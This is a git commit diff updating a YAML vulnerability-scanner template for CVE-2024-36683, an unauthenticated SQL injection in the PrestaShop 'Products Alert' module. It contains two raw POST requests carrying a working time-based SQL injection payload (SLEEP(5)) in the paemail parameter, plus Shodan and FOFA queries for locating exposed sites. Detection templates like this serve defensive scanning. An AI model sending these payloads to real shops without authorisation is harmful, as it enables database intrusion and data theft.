Update CVE-2024-36683.yaml

2024-09-16 18:06:50 +04:00 · 2024-09-16 18:06:50 +04:00 · 22c1cc9991
parent 0e4e0cf87b
commit 22c1cc9991
1 changed files with 14 additions and 32 deletions
--- a/http/cves/2024/CVE-2024-36683.yaml
+++ b/http/cves/2024/CVE-2024-36683.yaml
@ -1,16 +1,16 @@
 id: CVE-2024-36683

 info:
-  name: PrestaShop productsalert SQL Injection
+  name: PrestaShop productsalert - SQL Injection
  author: mastercho
  severity: critical
  description: |
-    In the module “Products Alert” (productsalert) up to version 1.7.4 from Smart Modules for PrestaShop, a guest can perform SQL injection in affected versions.
+    In the module 'Products Alert' (productsalert) up to version 1.7.4 from Smart Modules for PrestaShop, a guest can perform SQL injection in affected versions.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
  reference:
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36683
    - https://security.friendsofpresta.org/modules/2024/06/20/productsalert.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-36683
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
@ -19,45 +19,27 @@ info:
    epss-score: 0.04685
    epss-percentile: 0.91818
  metadata:
-    redirects: true
-    max-redirects: 3
+    verified: true
+    max-request: 2
    framework: prestashop
-    shodan-query: http.component:"Prestashop"
-  tags: cve,cve2023,prestashop,sqli,unauth,productsalert
-
-flow: http(1) && http(2)
+    shodan-query: html:"/productsalert"
+    fofa-query: body="/productsalert"
+  tags: cve,cve2023,prestashop,sqli,productsalert

 http:
  - raw:
      - |
-        GET / HTTP/1.1
-        Host: {{Hostname}}
-
-    host-redirects: true
-    max-redirects: 3
-    matchers:
-      - type: dsl
-        dsl:
-          - 'status_code == 200'
-          - 'contains(body, "modules/productsalert")'
-          - 'contains(body, "module/productsalert")'
-        condition: or
-        internal: true
-
-  - raw:
-      - |
-        @timeout: 20s
+        @timeout: 30s
        POST /modules/productsalert/pasubmit.php?submitpa&redirect_to=https://{{Hostname}}&type=2 HTTP/1.1
        Host: {{Hostname}}
-        Origin: {{BaseURL}}
        Content-Type: application/x-www-form-urlencoded

        cid=0&idl=6&option=2&pa_option=96119&paemail=1' AND (SELECT 2692 FROM (SELECT(SLEEP(5)))IuFA) AND 'pAlk'='pAlk&pasubmit=Crea%20un%20nuovo%20messaggio%20di%20notifica&pid=13158
+
      - |
-        @timeout: 20s
+        @timeout: 30s
        POST /module/productsalert/AjaxProcess HTTP/1.1
        Host: {{Hostname}}
-        Origin: {{BaseURL}}
        Content-Type: application/x-www-form-urlencoded

        cid=0&idl=6&option=2&pa_option=96119&paemail=1' AND (SELECT 2692 FROM (SELECT(SLEEP(5)))IuFA) AND 'pAlk'='pAlk&pid=13158
@ -68,6 +50,6 @@ http:
      - type: dsl
        name: time-based
        dsl:
-          - 'duration_1>=5'
-          - 'duration_2>=5'
-        condition: or
+          - 'duration_1>=5 || duration_2>=5'
+          - 'contains_all(tolower(response), "productsalert", "prestashop")'
+        condition: and